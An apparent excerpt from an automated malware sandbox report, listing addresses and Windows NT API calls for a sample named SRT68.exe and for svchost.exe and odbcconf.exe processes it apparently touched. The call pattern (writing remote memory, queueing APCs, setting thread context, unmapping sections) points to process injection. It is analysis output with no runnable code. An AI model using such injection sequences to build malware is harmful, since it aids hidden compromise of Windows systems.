                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772B60 NtClose,LdrInitializeThunk,2_2_03772B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03772DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03772C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037735C0 NtCreateMutant,LdrInitializeThunk,2_2_037735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03774340 NtSetContextThread,2_2_03774340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03774650 NtSuspendThread,2_2_03774650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772BF0 NtAllocateVirtualMemory,2_2_03772BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772BE0 NtQueryValueKey,2_2_03772BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772BA0 NtEnumerateValueKey,2_2_03772BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772B80 NtQueryInformationFile,2_2_03772B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772AF0 NtWriteFile,2_2_03772AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772AD0 NtReadFile,2_2_03772AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772AB0 NtWaitForSingleObject,2_2_03772AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772F60 NtCreateProcessEx,2_2_03772F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772F30 NtCreateSection,2_2_03772F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772FE0 NtCreateFile,2_2_03772FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772FB0 NtResumeThread,2_2_03772FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772FA0 NtQuerySection,2_2_03772FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772F90 NtProtectVirtualMemory,2_2_03772F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772E30 NtWriteVirtualMemory,2_2_03772E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772EE0 NtQueueApcThread,2_2_03772EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772EA0 NtAdjustPrivilegesToken,2_2_03772EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772E80 NtReadVirtualMemory,2_2_03772E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772D30 NtUnmapViewOfSection,2_2_03772D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772D10 NtMapViewOfSection,2_2_03772D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772D00 NtSetInformationFile,2_2_03772D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772DD0 NtDelayExecution,2_2_03772DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772DB0 NtEnumerateKey,2_2_03772DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772C60 NtCreateKey,2_2_03772C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772C00 NtQueryInformationProcess,2_2_03772C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772CF0 NtOpenProcess,2_2_03772CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772CC0 NtQueryVirtualMemory,2_2_03772CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772CA0 NtQueryInformationToken,2_2_03772CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03773010 NtOpenDirectoryObject,2_2_03773010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03773090 NtSetValueKey,2_2_03773090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037739B0 NtGetContextThread,2_2_037739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03773D70 NtOpenThread,2_2_03773D70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03773D10 NtOpenProcessToken,2_2_03773D10
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E84650 NtSuspendThread,LdrInitializeThunk,4_2_04E84650
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E84340 NtSetContextThread,LdrInitializeThunk,4_2_04E84340
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E82CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_04E82CA0
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E82C60 NtCreateKey,LdrInitializeThunk,4_2_04E82C60
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E82C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_04E82C70
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E82DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_04E82DF0
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E82DD0 NtDelayExecution,LdrInitializeThunk,4_2_04E82DD0
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E82D30 NtUnmapViewOfSection,LdrInitializeThunk,4_2_04E82D30
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E82D10 NtMapViewOfSection,LdrInitializeThunk,4_2_04E82D10
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E82EE0 NtQueueApcThread,LdrInitializeThunk,4_2_04E82EE0
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E82E80 NtReadVirtualMemory,LdrInitializeThunk,4_2_04E82E80
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E82FE0 NtCreateFile,LdrInitializeThunk,4_2_04E82FE0
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E82FB0 NtResumeThread,LdrInitializeThunk,4_2_04E82FB0
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E82F30 NtCreateSection,LdrInitializeThunk,4_2_04E82F30
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E82AF0 NtWriteFile,LdrInitializeThunk,4_2_04E82AF0
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E82AD0 NtReadFile,LdrInitializeThunk,4_2_04E82AD0
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E82BE0 NtQueryValueKey,LdrInitializeThunk,4_2_04E82BE0
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E82BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_04E82BF0
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E82BA0 NtEnumerateValueKey,LdrInitializeThunk,4_2_04E82BA0
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E82B60 NtClose,LdrInitializeThunk,4_2_04E82B60
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E835C0 NtCreateMutant,LdrInitializeThunk,4_2_04E835C0
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E839B0 NtGetContextThread,LdrInitializeThunk,4_2_04E839B0
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E82CF0 NtOpenProcess,4_2_04E82CF0
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E82CC0 NtQueryVirtualMemory,4_2_04E82CC0
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E82C00 NtQueryInformationProcess,4_2_04E82C00
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E82DB0 NtEnumerateKey,4_2_04E82DB0
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E82D00 NtSetInformationFile,4_2_04E82D00
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E82EA0 NtAdjustPrivilegesToken,4_2_04E82EA0
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E82E30 NtWriteVirtualMemory,4_2_04E82E30
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E82FA0 NtQuerySection,4_2_04E82FA0
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E82F90 NtProtectVirtualMemory,4_2_04E82F90
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E82F60 NtCreateProcessEx,4_2_04E82F60
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E82AB0 NtWaitForSingleObject,4_2_04E82AB0
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E82B80 NtQueryInformationFile,4_2_04E82B80
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E83090 NtSetValueKey,4_2_04E83090
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E83010 NtOpenDirectoryObject,4_2_04E83010
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E83D70 NtOpenThread,4_2_04E83D70
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E83D10 NtOpenProcessToken,4_2_04E83D10
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_02EF9220 NtCreateFile,4_2_02EF9220
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_02EF9380 NtReadFile,4_2_02EF9380
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_02EF9670 NtAllocateVirtualMemory,4_2_02EF9670
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_02EF9470 NtDeleteFile,4_2_02EF9470
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_02EF9510 NtClose,4_2_02EF9510
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_0100A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_0100A1EF
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FF8310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00FF8310
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_010051BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_010051BD
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FCD9750_2_00FCD975
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FC21C50_2_00FC21C5
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FD62D20_2_00FD62D2
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_010203DA0_2_010203DA
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FD242E0_2_00FD242E
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FC25FA0_2_00FC25FA
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FB66E10_2_00FB66E1
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FAE6A00_2_00FAE6A0
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FFE6160_2_00FFE616
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FD878F0_2_00FD878F
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FD68440_2_00FD6844
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FB88080_2_00FB8808
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_010208570_2_01020857
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_010088890_2_01008889
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FCCB210_2_00FCCB21
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FD6DB60_2_00FD6DB6
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FB6F9E0_2_00FB6F9E
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FB30300_2_00FB3030
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FCF1D90_2_00FCF1D9
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FC31870_2_00FC3187
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FA12870_2_00FA1287
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FC14840_2_00FC1484
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FB55200_2_00FB5520
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FC76960_2_00FC7696
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FB57600_2_00FB5760
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FC19780_2_00FC1978
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FD9AB50_2_00FD9AB5
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FAFCE00_2_00FAFCE0
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_01027DDB0_2_01027DDB
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FCBDA60_2_00FCBDA6
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FC1D900_2_00FC1D90
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FB3FE00_2_00FB3FE0
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FADF000_2_00FADF00
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_015B1DC80_2_015B1DC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004185432_2_00418543
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004010C02_2_004010C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004010BE2_2_004010BE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E1092_2_0040E109
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E1132_2_0040E113
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004012102_2_00401210
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042EBB32_2_0042EBB3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FDB32_2_0040FDB3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402E002_2_00402E00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004026102_2_00402610
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041674F2_2_0041674F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004167532_2_00416753
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DFC32_2_0040DFC3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FFD32_2_0040FFD3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FA3522_2_037FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038003E62_2_038003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E3F02_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E02742_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C02C02_2_037C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C81582_2_037C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038001AA2_2_038001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA1182_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037301002_2_03730100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F81CC2_2_037F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F41A22_2_037F41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D20002_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037407702_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037647502_2_03764750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373C7C02_2_0373C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375C6E02_2_0375C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038005912_2_03800591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037405352_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F24462_2_037F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E44202_2_037E4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EE4F62_2_037EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FAB402_2_037FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F6BD72_2_037F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA802_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037569622_2_03756962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0380A9A62_2_0380A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A02_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374A8402_2_0374A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037428402_2_03742840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E8F02_2_0376E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037268B82_2_037268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B4F402_2_037B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03760F302_2_03760F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E2F302_2_037E2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03782F282_2_03782F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374CFE02_2_0374CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03732FC82_2_03732FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BEFA02_2_037BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740E592_2_03740E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FEE262_2_037FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FEEDB2_2_037FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03752E902_2_03752E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FCE932_2_037FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DCD1F2_2_037DCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374AD002_2_0374AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373ADE02_2_0373ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03758DBF2_2_03758DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740C002_2_03740C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730CF22_2_03730CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0CB52_2_037E0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372D34C2_2_0372D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F132D2_2_037F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0378739A2_2_0378739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E12ED2_2_037E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375B2C02_2_0375B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037452A02_2_037452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372F1722_2_0372F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377516C2_2_0377516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374B1B02_2_0374B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0380B16B2_2_0380B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F70E92_2_037F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FF0E02_2_037FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EF0CC2_2_037EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037470C02_2_037470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FF7B02_2_037FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037856302_2_03785630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F16CC2_2_037F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F75712_2_037F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038095C32_2_038095C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DD5B02_2_037DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037314602_2_03731460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FF43F2_2_037FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FFB762_2_037FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B5BF02_2_037B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377DBF92_2_0377DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375FB802_2_0375FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B3A6C2_2_037B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FFA492_2_037FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F7A462_2_037F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EDAC62_2_037EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DDAAC2_2_037DDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03785AA02_2_03785AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E1AA32_2_037E1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037499502_2_03749950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375B9502_2_0375B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D59102_2_037D5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AD8002_2_037AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037438E02_2_037438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FFF092_2_037FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03703FD22_2_03703FD2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03703FD52_2_03703FD5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FFFB12_2_037FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03741F922_2_03741F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03749EB02_2_03749EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F7D732_2_037F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F1D5A2_2_037F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03743D402_2_03743D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375FDC02_2_0375FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B9C322_2_037B9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FFCF22_2_037FFCF2
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04EFE4F64_2_04EFE4F6
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04F024464_2_04F02446
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04EF44204_2_04EF4420
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04F105914_2_04F10591
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E505354_2_04E50535
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E6C6E04_2_04E6C6E0
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E4C7C04_2_04E4C7C0
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E507704_2_04E50770
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E747504_2_04E74750
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04EE20004_2_04EE2000
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04F081CC4_2_04F081CC
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04F041A24_2_04F041A2
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04F101AA4_2_04F101AA
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04ED81584_2_04ED8158
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E401004_2_04E40100
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04EEA1184_2_04EEA118
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04ED02C04_2_04ED02C0
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04EF02744_2_04EF0274
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E5E3F04_2_04E5E3F0
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04F103E64_2_04F103E6
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04F0A3524_2_04F0A352
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E40CF24_2_04E40CF2
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04EF0CB54_2_04EF0CB5
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E50C004_2_04E50C00
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E4ADE04_2_04E4ADE0
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E68DBF4_2_04E68DBF
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E5AD004_2_04E5AD00
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04EECD1F4_2_04EECD1F
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04F0EEDB4_2_04F0EEDB
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04F0CE934_2_04F0CE93
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E62E904_2_04E62E90
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E50E594_2_04E50E59
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04F0EE264_2_04F0EE26
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E5CFE04_2_04E5CFE0
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E42FC84_2_04E42FC8
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04ECEFA04_2_04ECEFA0
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04EC4F404_2_04EC4F40
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E92F284_2_04E92F28
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E70F304_2_04E70F30
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04EF2F304_2_04EF2F30
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E7E8F04_2_04E7E8F0
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E368B84_2_04E368B8
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E528404_2_04E52840
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E5A8404_2_04E5A840
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E529A04_2_04E529A0
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04F1A9A64_2_04F1A9A6
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E669624_2_04E66962
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E4EA804_2_04E4EA80
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04F06BD74_2_04F06BD7
